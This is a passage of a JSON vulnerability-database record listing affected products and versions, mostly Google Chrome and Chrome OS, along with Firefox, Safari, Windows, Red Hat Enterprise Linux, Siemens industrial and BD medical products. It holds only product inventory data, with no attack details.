        "version": "16.0.912.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1042"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.158.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.1"
      },
      {
        "_id": null,
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.30"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.45"
      },
      {
        "_id": null,
        "model": "sinumerik pcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "50.5"
      },
      {
        "_id": null,
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.130"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.765.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.100"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "26.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.53"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.553.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.494.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.745.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.484.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.10"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.829.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.482.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.32"
      },
      {
        "_id": null,
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "_id": null,
        "model": "totalys multiprocessor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1309.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.76"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "56"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20170"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.27"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.677.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.770.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.30"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "53"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.134"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.364.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.349.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.17"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.69"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.96"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.70"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.63"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.37"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1297.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1026"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.53"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.33"
      },
      {
        "_id": null,
        "model": "simatic ipc627d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.1"
      },
      {
        "_id": null,
        "model": "simatic ipc427c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.1"
      },
      {
        "_id": null,
        "model": "enterprise linux server year extended upd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.884.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1038"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.621.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.310"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1006"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.811.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.34"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.499.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.709.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.96"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.882.0"
      },
      {
        "_id": null,
        "model": "alaris systems manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1002.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3112.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.384.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.111"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.118"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.157.2"
      },
      {
        "_id": null,
        "model": "simatic hmi ktp mobile panels",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.134"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.721.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.76"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.113"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.563.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.750.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.24"
      },
      {
        "_id": null,
        "model": "chrome beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.193.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.771.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.603.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.59"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.43"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "44.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.8"
      },
      {
        "_id": null,
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.24"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.114"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "_id": null,
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.202"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.86"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.363.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.60"
      },
      {
        "_id": null,
        "model": "simatic ipc547e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1306.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.601.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.52"
      },
      {
        "_id": null,
        "model": "panel designer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.812.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.944.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.635.0"
      },
      {
        "_id": null,
        "model": "simatic s7-1518f-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.96"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1660.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1047.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.6"
      },
